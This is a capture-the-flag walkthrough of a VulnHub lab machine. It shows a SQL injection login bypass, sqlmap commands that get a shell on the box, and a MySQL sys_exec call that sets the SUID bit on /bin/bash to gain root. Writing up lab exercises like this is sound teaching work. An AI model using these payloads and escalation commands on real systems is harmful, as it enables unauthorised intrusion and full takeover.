The object of the game is to acquire root access
Based on reviewing the VulnHub.com site, the listed vulnerabilities were:
In addition, there was a text flag located on the system.
As you can see from nmap we have the below services:
• Apache (Web Server)
So the first thing we are going to have a look at will be the website.
The first thing we are going to do is see if we can log into this
website. I tried a bunch of default user names and password combo’s but
nothing worked. Finally I turned to the top web app vulnerabilities and
found that when I replaced the password with
pass' or 1=1 # the login didn’t fail, but still gave me an error (At this point assuming that admin is not a valid username).
Ok, So at this point, I suspect that the login is vulnerable to SQL Injection. So lets get sqlmap running and see if it can grab get more information about the server/website.
So when we submit the login, it sends a POST request to checklogin.php. The data in the post request is
Se when we run sqlmap, we will need to provide the below details.
-u http://10.0.0.56/checklogin.php (The website we will be sending the post too) --data "myusername=admin&mypassword=pass&Submit=Login" (The post Data)
so sqlmap suspects that mypassword is injectable. Now the problem is
that the default risk and level is too low to exploit this parameter. So
lets increase the level and risk, and re-scan. To do this we will
--risk 3 --level 4 to the end of sqlmap command.
Sweet. So lets see if we can get a shell on the server using the
Looks great. I now have the ability to execute commands on the server. At the moment we are under www-data. So our next challenge is to get to root.
Now something interesting that I found was that MySQL appears to be running as root. So maybe I can get it to execute some commands under root.
To do this, I would like to get a better shell on the box. To do this I will be using sqlmap with the
--os-pwn option. This will allow us to push a bind shell onto the server and run it.
Ok, So we now have a better shell on the Server. Next I need to locate some credentials that could be used to log into mysql. To do this we will look through the PHP files in the web servers root folder.
Ok, so lets take a look at CheckLogin.php.
As you can see above, we now have credentials.
Next we will need to connect to MySQL using
mysql -u root -p
Once connected to MySQL, we are going to run
Then we will use the funtion sys_exec in mysql to execute chmod. This is going to allow us to set the SUID bit of /bin/bash, which will allow us to run it as root.
To do this we will run
select sys_exec('chmod u+s /bin/bash');
Then when we exit MySQL, we will run
bash -p (Run bash in Privileged mode) and after checking permissions, we have root.
Now that we have root, we will go and open up the flag in /root.
If you find any errors or issues within this post, please comment below and I will correct. I will also provide any advice I can.